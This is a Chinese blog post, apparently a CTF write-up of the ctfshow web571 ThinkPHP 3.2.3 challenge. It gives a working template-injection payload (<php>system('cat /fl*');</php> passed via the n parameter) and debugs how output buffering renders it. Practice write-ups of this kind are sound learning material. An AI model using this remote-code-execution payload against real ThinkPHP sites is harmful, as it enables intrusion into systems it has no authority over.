记一道thinkphp题引发的思考

已于 2022-09-14 14:20:33 修改
阅读量1.2k 收藏
点赞数 3
分类专栏: other 文章标签: php javascript 开发语言
于 2022-05-24 11:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/124925967
版权

本篇仅代表个人观点。

ctfshow web571

先看题—ctfshow web571

提示:黑客建立了控制器后门

所以直接从控制器中找利用点,发现/Home/Controller/indexController.class.php中控制器可传参n,并且在最后会被渲染

public function index($n=''){
    $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}</style><div style="padding: 24px 48px;"> <h1>CTFshow</h1><p>thinkphp 专项训练</p><p>hello,'.$n.'黑客建立了控制器后门,你能找到吗</p>','utf-8');
}

所以利用点很明显了直接传参

/index.php/home/index/index/n/{php}system('cat /fl*');{/php}

但传参后并没有执行,主要是两个问题

1、标签问题,我这里用的是tp5的标签{},但后来经过查看手册tp3的标签是<>

2、就是关于URL解析方式的问题,如果执行语句是常规的echo $n;,是肯定没有问题的,但这里利用点是show方法,传参方式就需要是?n=这种常规的方式,之前的方式传入标签后是不会被解析的,本地测试了一下确实是这样:

<?php
namespace Home\Controller;
use Think\Controller;

class IndexController extends Controller{
    public function index($name=''){
   $this->show($name);
    }
}

在这里插入图片描述

所以最后的payload:

/index.php/home/index/index/?n=<php>system('cat /fl*');</php>

本地调试

本地有环境顺便debug了一波:

跟进show()->display()->fetch(),之前的$content一直是<php>echo 'Sentiment';</php>,经过129行后变成了Sentiment
在这里插入图片描述

就很疑惑跟了进去,发现这个地方进行了赋值

在这里插入图片描述

看了一下ob_get_contents用法——返回输出缓冲区的内容

在这里插入图片描述

这里echo没执行的原因:

ob_start()把输出内容输出到缓冲区,而不是到浏览器。然后用ob_get_contents得到缓冲区的数据。

思考

看完后就更蒙蔽了,这里为什么会在缓冲区进行解析?

后来看了师傅的文章,他说本题由于TMPL_ENGINE_TYPE我们默认的值是Think,而ctfshow设置的是php,所以可以进入117行的if,从而执行eval,执行了我们输入的语句

在这里插入图片描述

后来我把TMPL_ENGINE_TYPE改成了php进行debug,但无法正常解析执行。而且还有个问题就是即使我们不使用php而是使用默认的Think,模板也照样会渲染输出最后的Sentiment

所以我认为这里跟eval语句无关,还是一个缓冲区的问题。(仅个人观点)

于是在本地进行了ob_get_contents()的测试

<?php
ob_start();
echo "<br>echo '12'</br>";
$out1 = ob_get_contents();
ob_end_clean();
var_dump($out1);
?>

在这里插入图片描述

发现渲染了<br>标签,发生了换行,但里边的语句并没有执行

所以在tp源码这里,由于tp内置标签<php>会执行php语句,所以在渲染<php>echo 'Sentiment';</php>标签时,就相当于是执行了php语句echo 'Sentiment';,而由于ob_start()的存在这里的echo并不会直接输出出来,而是先放到缓存区,之后再通过ob_get_contents()得到缓冲区数据,就得到了最后的Sentiment值,

所以在tp的内部就相当于执行了:

<?php
ob_start();
echo 'Sentiment';
$contents = ob_get_contents();
if ($contents !== false) ob_end_clean();
return $contents;
?>

再经过retrun 返回就得到了129行的$content=Sentiment

后来查资料看师傅说:

大部分使用 php模板引擎技术 外部可以控制的情况下,都容易存在这种问题跟tp框架无关但并没有做过多的解释。

S1nJa
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web入门(thinkphp)
qq_53263789的博客
02-09 753
569 URL模式 查阅手册:URL模式 · ThinkPHP3.2.3完全开发手册 http://serverName/index.php/模块/控制器/操作 payload: 普通模式:/?m=Admin&c=Login&a=ctfshowLogin Pathinfo模式:/index.php/Admin/Login/ctfshowLogin 兼容模式:/?s=/Admin/Login/ctfshowLogin 570 路由 发现路由: 根据手册: 直接构造:这里直接执行不可以
Ctfshow web入门 thinkphp
feng的博客
04-25 3400
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
ctfshow thinkphp
qq_50589021的博客
10-13 705
前言 跟进一步增强php的代码审计能力,了解tp框架 从最基础的开始学习,目的不是为了一把梭,而是要明白它的原理和设计思路,为我们以后自主调试挖洞打下基础 web569——路由 本使用的版本为3.2.3 ThinkPHP3.2.3完全开发手册-架构-URL模式 入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作: http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。 payload
ctf攻防世界 WEB:php_rce
qq_30889301的博客
05-09 941
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
ctfshow ThinkPHP篇—3.2.3(569-578)
羽的博客
08-05 1846
文章目录web569相关内容web570web571web572web573web574web575web576web577web578 web569 相关内容 参考thinkphp手册 为了访问下图中的index方法并输出hello 123我们可以通过下面四种模式。 PATHINFO模式 http://localhost/index.php/Home/Index/index/name/123/ 普通模式 http://localhost/index.php?m=Home&c=Index&a
ThinkPHP调试模式与日志录概述
10-25
主要介绍了ThinkPHP调试模式与日志录的用法,需要的朋友可以参考下
ThinkPHP模板中判断volist循环的最后一条录的验证方法
10-25
主要介绍了ThinkPHP模板中判断volist循环的最后一条录的验证方法,需要的朋友可以参考下
ThinkPHP问答社区系统源码
最新发布
12-27
ThinkPHP问答社区系统源码,问答讨论社区系统源码,一套基本的问答讨论社区框架,基于thinkphp开发,只是部分不太完善,基础的问答模块还是比较完整的,有能力的大佬可以拿去二开一下使用的。 ThinkPHP问答社区系统...
Thinkphp 使用Dompdf
06-08
Thinkphp 使用Dompdf
thinkphp漏洞检测工具
06-06
ThinkPHP漏洞检测工具详解》 ThinkPHP是中国最流行的PHP框架之一,因其强大的功能和易用性深受开发者喜爱。然而,任何软件系统都可能存在安全漏洞,ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们...
攻防世界web高手进阶php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)
weixin_39637924的博客
03-09 368
目今天做CTF的时候,遇到下面这道,看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞,具体情况不清楚。。。 解过程去vulhub上搜了下ThinkPHP,还真有,把docker容器打开看了下,页面一摸一样哈哈: 这是一个远程代码执行漏洞,先学习vulhub复现这个漏洞的过程:输入:http://your-ip:8080/index.php?s=/Inde...
网盾安全学院综合靶场-ThinkPHP5 远程代码执行漏洞通关功略
m0_54360887的博客
02-24 3443
漏洞概述 我们知道在ThinkPHP5中是有远程代码执行漏洞的。这个漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 write up 靶场地址:http://ctf.wangdun.cn 靶场信息: 影响范围 ThinkPHP 5.0.全版本 这个漏洞在测试当中发现该漏洞并不通杀,还是得看复现的版本,目前所测试的情况如下: 当前映射80端口为47052,我们访问该地址 我们可以构造payload来测试下命令执行漏洞: ..
CTF——Thinkphp5远程命令执行漏洞利用
qq_45521281的博客
05-03 7335
[BJDCTF 2nd]old-hack(5.0.23) 进入之后: 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。 Thinkphp5远程命令执行漏洞 漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 $_POST['_meth...
CTF(Web方向练习)(持续更新)
m0_56010012的博客
02-23 5102
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞)
Onlyone_1314的博客
09-03 1073
先访问目场景: 主页提示我们:网页使用的是ThinkPHP框架,版本为5.0 这道主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefuncti
ctfshow- thinkphp
Yasso的博客
11-26 727
web569 @[TOC]web569
think php 后门,看我如何调查放置后门之Thinkphp
weixin_28911479的博客
03-20 461
### 简要描述:提交这个我纠结了很久,本来我是可以做一个坏帽子,贼喊捉贼,昨天晚上想了想,我的偶像猪猪侠提交的那些漏洞和我这比我这就是渣渣,他都可以无私的提交而不去换取不正当的金钱,我为什么就不可以呢?这个应该属于通用漏洞奖励鸟### 详细说明:渗透thinkphp完全是因为无聊之余搞了搞,可是没想到的还搞进去了,呵呵,首先在一个群里面发现别人发了一个thinkphp的连接 打开是一个压缩包 8...
ctfshow web入门 web57
lonmar的博客
11-24 1122
文章目录0x010x020x03 看wp分析一波 只要凑出36即可 0x01 shell中各种括号()、(())、[]、[[]]、{}的作用和区别 : https://blog.csdn.net/qq_46091464/article/details/108563368 ${_}:代表上一次命令执行的结果 $(()): 做运算 0x02 之前没有命令返回或者执行,结果应该是空,与""等价 又 $((""))值为0,$((~$((""))))值为-1,再做拼接: 所以可以拼接得到-37 , -37
thinkphp5.0中使用curl调用接口数据
skx19980524的博客
03-23 2458
//第一种数据调用方式 $arr = array("a"=>"123456","b123456"=>"zhaotoubiao"); //接口地址与token $url ='https://地址?token=token'; $data_string=json_encode($arr); //初始化 $ch = curl_init(); ...
thinkphp面试
09-08
思考一个例子:如果面试官问到如何根据用户的ID将聊天信息存放在不同的表中,我们可以使用hash的方式来获得表名。可以通过hash函数将用户ID转换成一个字符串,然后取其中的一部分作为表名的后缀。例如,可以使用crc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值